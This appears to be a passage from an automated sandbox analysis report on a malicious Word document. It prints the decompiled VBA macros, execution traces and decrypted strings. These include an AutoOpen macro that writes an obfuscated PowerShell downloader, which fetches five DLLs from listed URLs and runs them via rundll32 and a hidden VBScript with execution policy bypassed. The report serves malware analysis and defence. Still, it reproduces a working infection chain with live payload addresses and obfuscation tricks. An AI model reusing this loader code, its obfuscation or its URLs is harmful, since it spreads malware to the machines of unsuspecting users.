$ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://lotolands.com/JtaTAt4Ej/130921.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;

                                                                                              ttt2

                                                                                              Replace

                                                                                              Replace("Dim WAITPLZ, WS WAITPLZ = DateAdd(Chr(115), 2, Now()) Do Until (Now() > WAITPLZ) Loop On Error Resume Next BB="Powershell" CC=" -ExecutionPolicy Bypass" SS=" & " FF="%AppData%\www.ps1" OK = BB+CC+QQ+SS+FF Set Ran = CreateObject("WScript.Shell") Ran.Run OK,0 WScript.Sleep(11000) OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr" Ran.Run OK1,0 OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr" Ran.Run OK2,0 OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr" Ran.Run OK3,0 OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr" Ran.Run OK4,0 OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr" Ran.Run OK5,0 ","ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ","") -> Dim WAITPLZ, WS WAITPLZ = DateAdd(Chr(115), 2, Now()) Do Until (Now() > WAITPLZ) Loop On Error Resume Next BB="Powershell" CC=" -ExecutionPolicy Bypass" SS=" & " FF="%AppData%\www.ps1" OK = BB+CC+QQ+SS+FF Set Ran = CreateObject("WScript.Shell") Ran.Run OK,0 WScript.Sleep(11000) OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr" Ran.Run OK1,0 OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr" Ran.Run OK2,0 OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr" Ran.Run OK3,0 OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr" Ran.Run OK4,0 OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr" Ran.Run OK5,0

                                                                                              FreeFile

                                                                                              Open

                                                                                              Open("C:\Users\Albus\AppData\Roaming\www.ps1")

                                                                                              Part of subcall function NoHex@Module3: DateAdd

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              Part of subcall function NoHex@Module3: DoEvents

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              FileSystemObject

                                                                                              MoveFile

                                                                                              Part of subcall function NoHex@Module3: DateAdd

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              Part of subcall function NoHex@Module3: DoEvents

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              Open

                                                                                              Open("C:\Users\Albus\AppData\Roaming\www.txt")

                                                                                              Part of subcall function NoHex@Module3: DateAdd

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              Part of subcall function NoHex@Module3: DoEvents

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              GetObject

                                                                                              GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")

                                                                                              Run

                                                                                              IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0") -> 0

                                                                                              Chr

                                                                                              StringsDecrypted Strings
                                                                                              "USERPROFILE"
                                                                                              "error.txt"
                                                                                              """"
                                                                                              "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"
                                                                                              "new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
                                                                                              "0"
                                                                                              "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo ""%~f0"" %*"
                                                                                              LineInstructionMeta Information
                                                                                              10

                                                                                              Sub eFile()

                                                                                              12

                                                                                              Dim QQ1 as Object

                                                                                              executed
                                                                                              13

                                                                                              Set QQ1 = New deutsche

                                                                                              15

                                                                                              On Error Resume Next

                                                                                              17

                                                                                              Dim WW, ff, Ne, ii, ss, hh as String

                                                                                              19

                                                                                              Dim RO, ROI as String

                                                                                              20

                                                                                              RO = Environ("USERPROFILE") & "\AppData\Roaming\"

                                                                                              Environ("USERPROFILE") -> C:\Users\Albus

                                                                                              executed
                                                                                              22

                                                                                              ss = "error.txt"

                                                                                              23

                                                                                              ROI = RO + "www.ps1"

                                                                                              24

                                                                                              ROI2 = RO + "www.txt"

                                                                                              25

                                                                                              ii = ""

                                                                                              26

                                                                                              Ne = "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"

                                                                                              28

                                                                                              WW = QQ1.ttt1.Text

                                                                                              ttt1

                                                                                              29

                                                                                              ff = Replace(WW, Ne, ii)

                                                                                              Replace("start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://chaturanga.groopy.com/7SEZBnhMLW/130921.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://lotolands.com/JtaTAt4Ej/130921.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; ","ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ","") -> start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://chaturanga.groopy.com/7SEZBnhMLW/130921.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://lotolands.com/JtaTAt4Ej/130921.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;

                                                                                              executed
                                                                                              31

                                                                                              WW2 = QQ1.ttt2.Text

                                                                                              ttt2

                                                                                              32

                                                                                              ff2 = Replace(WW2, Ne, ii)

                                                                                              Replace("Dim WAITPLZ, WS WAITPLZ = DateAdd(Chr(115), 2, Now()) Do Until (Now() > WAITPLZ) Loop On Error Resume Next BB="Powershell" CC=" -ExecutionPolicy Bypass" SS=" & " FF="%AppData%\www.ps1" OK = BB+CC+QQ+SS+FF Set Ran = CreateObject("WScript.Shell") Ran.Run OK,0 WScript.Sleep(11000) OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr" Ran.Run OK1,0 OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr" Ran.Run OK2,0 OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr" Ran.Run OK3,0 OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr" Ran.Run OK4,0 OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr" Ran.Run OK5,0 ","ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ","") -> Dim WAITPLZ, WS WAITPLZ = DateAdd(Chr(115), 2, Now()) Do Until (Now() > WAITPLZ) Loop On Error Resume Next BB="Powershell" CC=" -ExecutionPolicy Bypass" SS=" & " FF="%AppData%\www.ps1" OK = BB+CC+QQ+SS+FF Set Ran = CreateObject("WScript.Shell") Ran.Run OK,0 WScript.Sleep(11000) OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr" Ran.Run OK1,0 OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr" Ran.Run OK2,0 OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr" Ran.Run OK3,0 OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr" Ran.Run OK4,0 OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr" Ran.Run OK5,0

                                                                                              executed
                                                                                              34

                                                                                              MyFile = FreeFile

                                                                                              FreeFile

                                                                                              36

                                                                                              Open ROI For Output As # MyFile

                                                                                              Open("C:\Users\Albus\AppData\Roaming\www.ps1")

                                                                                              executed
                                                                                              37

                                                                                              Print # MyFile, ff

                                                                                              38

                                                                                              Close # MyFile

                                                                                              40

                                                                                              NoHex 2

                                                                                              42

                                                                                              Dim fso as New FileSystemObject

                                                                                              FileSystemObject

                                                                                              43

                                                                                              fso.MoveFile RO + ss, ROI

                                                                                              MoveFile

                                                                                              45

                                                                                              NoHex 2

                                                                                              48

                                                                                              Open ROI2 For Output As # MyFile

                                                                                              Open("C:\Users\Albus\AppData\Roaming\www.txt")

                                                                                              executed
                                                                                              49

                                                                                              Print # MyFile, ff2

                                                                                              50

                                                                                              Close # MyFile

                                                                                              52

                                                                                              NoHex 2

                                                                                              55

                                                                                              Dim h11 as Object

                                                                                              56

                                                                                              Set h11 = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")

                                                                                              GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")

                                                                                              executed
                                                                                              58

                                                                                              h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)

                                                                                              IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0") -> 0

                                                                                              Chr

                                                                                              executed
                                                                                              60

                                                                                              End

                                                                                              61

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Part of subcall function eFile@Module3: Environ

                                                                                              Part of subcall function eFile@Module3: ttt1

                                                                                              Part of subcall function eFile@Module3: Replace

                                                                                              Part of subcall function eFile@Module3: ttt2

                                                                                              Part of subcall function eFile@Module3: Replace

                                                                                              Part of subcall function eFile@Module3: FreeFile

                                                                                              Part of subcall function eFile@Module3: Open

                                                                                              Part of subcall function eFile@Module3: FileSystemObject

                                                                                              Part of subcall function eFile@Module3: MoveFile

                                                                                              Part of subcall function eFile@Module3: Open

                                                                                              Part of subcall function eFile@Module3: GetObject

                                                                                              Part of subcall function eFile@Module3: Run

                                                                                              Part of subcall function eFile@Module3: Chr

                                                                                              LineInstructionMeta Information
                                                                                              3

                                                                                              Sub YRJTYSR()

                                                                                              6

                                                                                              Call eFile()

                                                                                              executed
                                                                                              8

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              DateAdd

                                                                                              Now

                                                                                              DoEvents

                                                                                              Now

                                                                                              StringsDecrypted Strings
                                                                                              "s"
                                                                                              LineInstructionMeta Information
                                                                                              63

                                                                                              Public Sub NoHex(ByVal Seconds as Double)

                                                                                              64

                                                                                              Dim EndTime as Date

                                                                                              executed
                                                                                              65

                                                                                              EndTime = DateAdd("s", Seconds, Now)

                                                                                              DateAdd

                                                                                              Now

                                                                                              66

                                                                                              Do

                                                                                              Now

                                                                                              67

                                                                                              DoEvents

                                                                                              DoEvents

                                                                                              68

                                                                                              Loop Until Now >= EndTime

                                                                                              Now

                                                                                              69

                                                                                              End Sub

                                                                                              Module: ThisDocument

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "ThisDocument"

                                                                                              2

                                                                                              Attribute VB_Base = "1Normal.ThisDocument"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = True

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Executed Functions
                                                                                              APIsMeta Information

                                                                                              lp

                                                                                              MsgBox

                                                                                              Part of subcall function func1@ThisDocument: DoEvents

                                                                                              Part of subcall function func1@ThisDocument: wdCharacter

                                                                                              Part of subcall function func2@ThisDocument: DoEvents

                                                                                              Part of subcall function func2@ThisDocument: WholeStory

                                                                                              Part of subcall function func2@ThisDocument: DoEvents

                                                                                              Part of subcall function func2@ThisDocument: DoEvents

                                                                                              StringsDecrypted Strings
                                                                                              " workright "
                                                                                              " There is Error "
                                                                                              " no "
                                                                                              " There is Error "
                                                                                              LineInstructionMeta Information
                                                                                              9

                                                                                              Sub AutoOpen()

                                                                                              10

                                                                                              IfYes = " workright "

                                                                                              executed
                                                                                              11

                                                                                              If lp = " no " Then

                                                                                              lp

                                                                                              12

                                                                                              MsgBox (" There is Error ")

                                                                                              MsgBox

                                                                                              13

                                                                                              Else

                                                                                              14

                                                                                              On Error Resume Next

                                                                                              15

                                                                                              YRJTYSR

                                                                                              16

                                                                                              func1

                                                                                              17

                                                                                              func2

                                                                                              19

                                                                                              Endif

                                                                                              20

                                                                                              End Sub

                                                                                              Non-Executed Functions
                                                                                              APIsMeta Information

                                                                                              ActiveDocument

                                                                                              Open

                                                                                              Copy

                                                                                              Paste

                                                                                              InsertBreak

                                                                                              Close

                                                                                              StringsDecrypted Strings
                                                                                              "*.doc*"
                                                                                              LineInstructionMeta Information
                                                                                              21

                                                                                              Sub MergeFiles()

                                                                                              22

                                                                                              Dim avFiles, lr as Long

                                                                                              23

                                                                                              Dim docAct as Document, docNow as Document

                                                                                              25

                                                                                              With Application.FileDialog(msoFileDialogFilePicker)

                                                                                              26

                                                                                              . InitialFileName = "*.doc*"

                                                                                              27

                                                                                              . AllowMultiSelect = True

                                                                                              28

                                                                                              If . Show = False Then

                                                                                              28

                                                                                              Exit Sub

                                                                                              28

                                                                                              Endif

                                                                                              29

                                                                                              Set docAct = ActiveDocument

                                                                                              ActiveDocument

                                                                                              30

                                                                                              For lr = 1 To . SelectedItems.Count

                                                                                              31

                                                                                              Set docNow = Documents.Open(. SelectedItems(lr))

                                                                                              Open

                                                                                              32

                                                                                              docNow.Range.Copy

                                                                                              Copy

                                                                                              33

                                                                                              docAct.Range(docAct.Range.End - 1).Paste

                                                                                              Paste

                                                                                              34

                                                                                              docAct.Range(docAct.Range.End - 1).InsertBreak Type := 0

                                                                                              InsertBreak

                                                                                              35

                                                                                              docNow.Close 0

                                                                                              Close

                                                                                              36

                                                                                              Next lr

                                                                                              37

                                                                                              End With

                                                                                              38

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              DoEvents

                                                                                              WholeStory

                                                                                              DoEvents

                                                                                              DoEvents

                                                                                              LineInstructionMeta Information
                                                                                              44

                                                                                              Function func2()

                                                                                              45

                                                                                              DoEvents

                                                                                              DoEvents

                                                                                              46

                                                                                              Selection.WholeStory

                                                                                              WholeStory

                                                                                              48

                                                                                              DoEvents

                                                                                              DoEvents

                                                                                              49

                                                                                              With Selection.Font

                                                                                              50

                                                                                              . NameFarEast = False

                                                                                              51

                                                                                              . NameAscii = False

                                                                                              52

                                                                                              . NameOther = False

                                                                                              53

                                                                                              . Name = False

                                                                                              54

                                                                                              . Hidden = False

                                                                                              55

                                                                                              End With

                                                                                              56

                                                                                              DoEvents

                                                                                              DoEvents

                                                                                              57

                                                                                              End Function

                                                                                              APIsMeta Information

                                                                                              DoEvents

                                                                                              Part of subcall function Delete@Module2: Execute

                                                                                              Part of subcall function Delete@Module2: Item

                                                                                              wdCharacter

                                                                                              LineInstructionMeta Information
                                                                                              39

                                                                                              Function func1()

                                                                                              40

                                                                                              DoEvents

                                                                                              DoEvents

                                                                                              41

                                                                                              Selection.Delete Unit := wdCharacter, Count := 1

                                                                                              wdCharacter

                                                                                              42

                                                                                              End Function

                                                                                              Module: UserForm1

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "UserForm1"

                                                                                              2

                                                                                              Attribute VB_Base = "0{95570FB4-F9A8-48A4-B0F7-392245E94ABE}{3A1B958B-2850-4504-93D8-E3B1B84B8470}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = False

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = False

                                                                                              Module: deutsche

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "deutsche"

                                                                                              2

                                                                                              Attribute VB_Base = "0{D803FC02-390F-4713-A33E-D0302CEAECAF}{603C2BE7-F2C8-4164-952A-B28BFA79AD68}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = False

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = False

                                                                                              Non-Executed Functions
                                                                                              LineInstructionMeta Information
                                                                                              11

                                                                                              Private Sub UserForm_Click()

                                                                                              13

                                                                                              End Sub

                                                                                              Reset < >

                                                                                                Executed Functions

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.492117077.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab5358f880f8c419b08de0f3751060a9eae401aa38e4f5db71ea035261bee82d
                                                                                                • Instruction ID: 8d5144535ba43fc1d701e666b6cea3726bfb517b85233809d6bfdefa763ea68b
                                                                                                • Opcode Fuzzy Hash: ab5358f880f8c419b08de0f3751060a9eae401aa38e4f5db71ea035261bee82d
                                                                                                • Instruction Fuzzy Hash: C781116191EBC64FE71387785CB56A17FB0AF17208B1E01EBD8C4CB0E3D948595AD362
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.492117077.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: db074fde80dd100470f9c26542f136fc341a4bd2bc5e9c8c0eebd8aab43baa8c
                                                                                                • Instruction ID: 3570bc21bf978e7ccc8a9475cc43eb4953019aad6f6ac3a28b4721ad4ef38775
                                                                                                • Opcode Fuzzy Hash: db074fde80dd100470f9c26542f136fc341a4bd2bc5e9c8c0eebd8aab43baa8c
                                                                                                • Instruction Fuzzy Hash: 5B41566190E7C60FE71397789CA46A17FB19F57254F0E02EBE488CB0E3D9485A69C362
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.492117077.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 22899817e173d163c477b26b595b408b3ece4622eb00ae95420913d2c840ba85
                                                                                                • Instruction ID: 5d161cb9956e71586329aee9c77d38f6ab855e9ea383f58d16a4b1a9f22d0fcb
                                                                                                • Opcode Fuzzy Hash: 22899817e173d163c477b26b595b408b3ece4622eb00ae95420913d2c840ba85
                                                                                                • Instruction Fuzzy Hash: 4D31CF11A1EBC60FE363977858A57717FE0DF17209F1900EBE488CB0A3D948AD49C362
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.492117077.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f10d37257788e5169ab4ae33a965c29b5c380592481ea66a7df3bfd6812d6183
                                                                                                • Instruction ID: 4173dfaab918b882f553b25d390baad8ceabab8a636aab44d3151dd02b5679cb
                                                                                                • Opcode Fuzzy Hash: f10d37257788e5169ab4ae33a965c29b5c380592481ea66a7df3bfd6812d6183
                                                                                                • Instruction Fuzzy Hash: CA01995294E7DA4FE303177958652903FB0AF57214B1A12D3D094CF1B3E6480A9ED762
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%